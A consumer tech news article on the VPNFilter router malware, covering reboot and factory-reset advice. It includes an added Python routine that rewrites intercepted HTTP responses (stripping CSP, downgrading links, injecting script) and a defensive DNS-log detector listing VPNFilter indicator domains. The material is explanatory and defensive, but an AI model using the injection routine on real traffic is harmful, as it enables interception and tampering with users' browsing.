That Russian router malware threat might be worse than feared

In some cases, a full factory reset may be required.


Your gateway to the Internet may be the portal that foreign hackers are using to snatch your data. The FBI recently issued a security notice ( go.mac cyba) warning that all home and small-office routers should be rebooted after Cisco's Talos group ( go.mac discovered sophisticated Russian-linked "VPNFilter" malware infecting at least 500,000 networking devices.

Here's what you need to know about VPNFilter and the FBI's guidance to reboot your router, which might not even safeguard against the malware completely.


Since all your Internet and local network traffic flows through your router, the threat can be pretty severe.

“VPNFilter is able to render small office and home office routers inoperable,” the FBI warns. “The malware can potentially also collect information passing through the router.”

Routers are especially ripe targets for hackers because they usually connect directly to the Internet and aren't protected by your PC's antivirus or other security software. Most people don't install router firmware updates, either, which leaves known vulnerabilities exposed. VPNFilter also encrypts its network traffic, which can make detection even more difficult, the FBI says.

Most of the recent infections Cisco observed were in Ukraine, and the Justice Department ( go.mac jsdp) attributed VPNFilter to the “Sofacy Group,” an espionage group associated with Russia.


It gets worse. In a follow-up post, Cisco's Talos ( go.mac reported “a new stage 3 module that injects malicious content into web traffic as it passes through a network device.” This is a “man-in-the-middle” attack: because the infected router sits between you and every site you visit, the attackers can intercept your traffic and inject malicious code into it without your knowledge. That means a hacker can manipulate what you see on your screen while carrying out other malicious tasks behind the scenes. As Craig Williams, a senior technology leader and global outreach manager at Talos, explained to Ars Technica, “They can modify your bank account balance so that it looks normal while at the same time they're siphoning off money and potentially PGP keys and things like that. They can manipulate everything going in and out of the device.” That's a much greater threat than initially feared. One caveat worth knowing: the injection works on unencrypted HTTP traffic. A properly encrypted HTTPS connection can't be rewritten in transit, which is why Talos reported that the module also tries to downgrade HTTPS requests to plain HTTP.
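To make the rewrite concrete, here is an added illustration (example code written for this page, not Talos's analysis code and not the malware's own module) of what a hostile hop in the traffic path can do to a plaintext HTTP response: strip the Content-Security-Policy header that would block injected script, turn every https:// link in the page into http:// so the next click is also in the clear, insert a payload before </body>, and fix Content-Length so the browser notices nothing. The sample response, the bank.example hostname and the payload are all constructed for the example.

```python
from __future__ import annotations

# Added illustration of response injection by a device in the traffic path.
# Not Talos's code and not the malware's own code; the sample data is constructed.
HEADER_END = b"\r\n\r\n"

# Constructed sample: a plaintext HTTP response exactly as the router sees it on the wire.
SAMPLE_BODY = (
    b"<html><body><p>Balance: $1,200.00</p>"
    b'<a href="https://bank.example/transfer">Transfer</a></body></html>'
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Security-Policy: script-src 'self'\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + HEADER_END + SAMPLE_BODY
)
# Constructed stand-in for whatever script the attacker wants the browser to run.
PAYLOAD = b"<script>/* constructed stand-in for injected code */</script>"


def split_response(raw: bytes) -> tuple[list[bytes], bytes]:
    """Split a raw response into its header lines and its body."""
    head, sep, body = raw.partition(HEADER_END)
    if not sep:
        raise ValueError("incomplete HTTP response head")
    return head.split(b"\r\n"), body


def _header_name(line: bytes) -> bytes:
    return line.split(b":", 1)[0].strip().lower()


def rewrite_response(raw: bytes, payload: bytes) -> bytes:
    """Return what the victim's browser receives after the hop has altered the response.

    Only HTML is touched: a careful injector leaves images, JSON and scripts alone so
    nothing visibly breaks. For HTML it (1) drops the CSP header that would block the
    injected inline script, (2) downgrades every absolute https:// link so the user's
    next request also travels in plaintext, (3) inserts the payload before </body>
    and (4) recomputes Content-Length so the extra bytes go unnoticed.
    """
    lines, body = split_response(raw)
    status, headers = lines[0], lines[1:]
    content_type = next((h for h in headers if _header_name(h) == b"content-type"), b"")
    if b"text/html" not in content_type.lower():
        return raw

    body = body.replace(b"https://", b"http://")
    idx = body.lower().rfind(b"</body>")
    body = body[:idx] + payload + body[idx:] if idx != -1 else body + payload

    kept = [h for h in headers
            if _header_name(h) not in (b"content-length", b"content-security-policy")]
    kept.append(b"Content-Length: " + str(len(body)).encode())
    return b"\r\n".join([status, *kept]) + HEADER_END + body


if __name__ == "__main__":
    print(rewrite_response(SAMPLE_RESPONSE, PAYLOAD).decode())
```

None of this is possible against a response the router can only see as TLS ciphertext, which is why the downgrade step matters to the attacker and why a site that is on the browser's HSTS preload list (so the browser refuses to issue the plain-HTTP request at all) is out of reach for this module.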


The FBI's security notice suggests that all router owners reboot their devices. Additionally, Cisco's Talos group says that “Due to the potential for destructive action by the threat actor, we recommend out of an abundance of caution that these actions be taken for all SOHO or NAS devices, whether or not they are known to be affected by this threat.”

So you should reboot your router no matter what. That said, Symantec ( go.mac released the following list of routers and NAS devices known to be susceptible to VPNFilter. Some are popular affordable models, and one (the Netgear WNR1000) is provided to Comcast customers in some circumstances.

> Linksys E1200

> Linksys E2500

> Linksys WRVS4400N

> MikroTik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072

> Netgear DGN2200

> Netgear R6400

> Netgear R7000

> Netgear R8000

> Netgear WNR1000

> Netgear WNR2000

> QNAP TS251

> QNAP TS439 Pro

> Other QNAP NAS devices running QTS software

> TP-Link R600VPN

Just this week, however, Cisco issued a warning that the threat goes beyond even those models and includes a wider swath of routers manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. So once again: The FBI and Cisco's crack security squad suggest that we all reboot our routers, even if ours isn't on this list.


Rebooting your router eradicates what Cisco calls the “Stage 2” and “Stage 3” elements of VPNFilter, the destructive part of the malware. Those stages run only in the router's memory and are never written to its permanent storage, so they don't survive a power cycle.

Rebooting your router is easy. Simply unplug it from the wall, wait 30 seconds, and plug it back in. Done!


There's more you can do. Let's start with the easy steps.

The FBI and some hardware makers recommend disabling remote management features on your router, which are off by default in most cases. You'll also want to change your router's default login credentials, swapping in a strong, unique password, not one you use for any other websites or services. PCWorld's guide to the best password managers ( go.mac can help if you aren't using one already.

Even though routers aren't typically protected by your PC's antivirus, Symantec says its software can detect VPNFilter. Running security software on your computer helps it stay as safe as possible, and this episode serves as a reminder that you should be doing so. PCWorld's guide to the best antivirus for Windows PCs ( go.mac can help you pick the best for your situation.

Now for the bad news.


What makes VPNFilter so sophisticated is its “Stage 1” element, which persists through a reboot and then contacts the hackers' servers to reinstall the other stages of the malware. The Justice Department seized a domain that the malware used to fetch VPNFilter's later stages onto infected devices, but that doesn't mean the threat is eliminated, as the malware also has other ways of reaching the hackers.
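Because Stage 1 has to reach out from the router to fetch the later stages, that call-home is the thing to look for. The following added example (written for this page; not from the FBI notice, Talos or Symantec) runs two checks over resolver log lines: it matches the published Stage 1 rendezvous indicators (the toknowall.com domain the Justice Department seized, and the photobucket.com image hosting the malware tried first), and it flags any DNS lookup made by the router's own address for a name outside a short allowlist, since a router has little reason to resolve anything beyond its vendor's update and time servers. The log lines are constructed in dnsmasq's query format, and the router address, the allowlist and the vendor hostname are assumptions to be adjusted for your network.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Added example, not from the FBI, Talos or Symantec. Sample data is constructed.
ROUTER_IP = "192.168.1.1"  # assumption: the router's own LAN address

# Names the router legitimately resolves on its own; assumed, tune for your vendor.
ROUTER_ALLOWLIST = ("pool.ntp.org", "updates.router-vendor.example")

# Stage 1 rendezvous indicators from the public reporting on VPNFilter.
VPNFILTER_INDICATORS = ("toknowall.com", "photobucket.com")

# dnsmasq logs client queries as: query[A] <name> from <client-ip>
DNSMASQ_QUERY = re.compile(
    r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>[0-9.]+)"
)


@dataclass(frozen=True)
class Alert:
    kind: str      # "vpnfilter-ioc" or "router-egress"
    client: str
    name: str
    line: str


def _in_domain_set(name: str, domains) -> bool:
    """True if name equals, or is a subdomain of, any entry in domains."""
    return any(name == d or name.endswith("." + d) for d in domains)


def parse_query(line: str) -> tuple[str, str, str] | None:
    """Return (name, client, qtype) for a dnsmasq query line, else None."""
    m = DNSMASQ_QUERY.search(line)
    if not m:
        return None
    return m["name"].lower().rstrip("."), m["client"], m["qtype"]


def analyze(lines, router_ip: str = ROUTER_IP) -> list[Alert]:
    """Flag indicator hits from any client, and unexpected lookups by the router itself."""
    alerts: list[Alert] = []
    for line in lines:
        parsed = parse_query(line)
        if parsed is None:
            continue            # replies, cache entries and other noise
        name, client, _ = parsed
        if _in_domain_set(name, VPNFILTER_INDICATORS):
            alerts.append(Alert("vpnfilter-ioc", client, name, line))
        elif client == router_ip and not _in_domain_set(name, ROUTER_ALLOWLIST):
            alerts.append(Alert("router-egress", client, name, line))
    return alerts


# Constructed sample log: one clean client, and a router that is looking up
# both published indicators plus an unexplained third host.
SAMPLE_LOG = [
    "May 25 09:00:01 dnsmasq[812]: query[A] pool.ntp.org from 192.168.1.1",
    "May 25 09:00:02 dnsmasq[812]: query[A] www.example.com from 192.168.1.42",
    "May 25 09:00:07 dnsmasq[812]: query[A] photobucket.com from 192.168.1.1",
    "May 25 09:00:09 dnsmasq[812]: query[A] toknowall.com from 192.168.1.1",
    "May 25 09:00:11 dnsmasq[812]: reply toknowall.com is NXDOMAIN",
    "May 25 09:00:12 dnsmasq[812]: query[A] cdn.unknown-host.example from 192.168.1.1",
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(f"{alert.kind:15} {alert.client:14} {alert.name}")
```

The router-egress rule only works when your clients talk to the resolver directly. If the router forwards everyone's DNS through its own address, every query will appear to come from 192.168.1.1 and the rule becomes noise; in that setup, keep the indicator match and move the "who is calling out" question to the firewall or flow logs instead.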

The only way to fully remove the malware is to perform a factory reset of your router and then update it to the latest firmware revision available, which will protect against the known vulnerabilities. It's a complicated procedure that will require you to reconfigure your network settings, but we'd recommend doing it if your router is on the list of devices known to be vulnerable to VPNFilter. Treat the firmware update as part of the same job: a reset by itself returns the router to the same vulnerable state it was compromised in. If the manufacturer no longer provides firmware updates for your model, consider replacing it.

The exact procedure for resetting a router can vary, though it usually involves pressing a pin or the end of a paperclip into a small pinhole button on the hardware, followed by connecting the device to a PC via Ethernet to complete the initial configuration. Linksys ( go.mac, MikroTik ( go.mac, Netgear ( go.mac, QNAP ( go.mac and TP-Link ( go.mac have all posted instructions explaining how to factory reset your routers and otherwise protect against VPNFilter.

Performing a little prep work beforehand can make the experience less of a hassle. Although you'll want to change your router's default administrative username and password, jot down your existing network name(s) and Wi-Fi password before you reset your hardware. When you create a new network after factory resetting your router, it's safe to use the same Wi-Fi name and password as before, which will let all your devices reconnect easily.
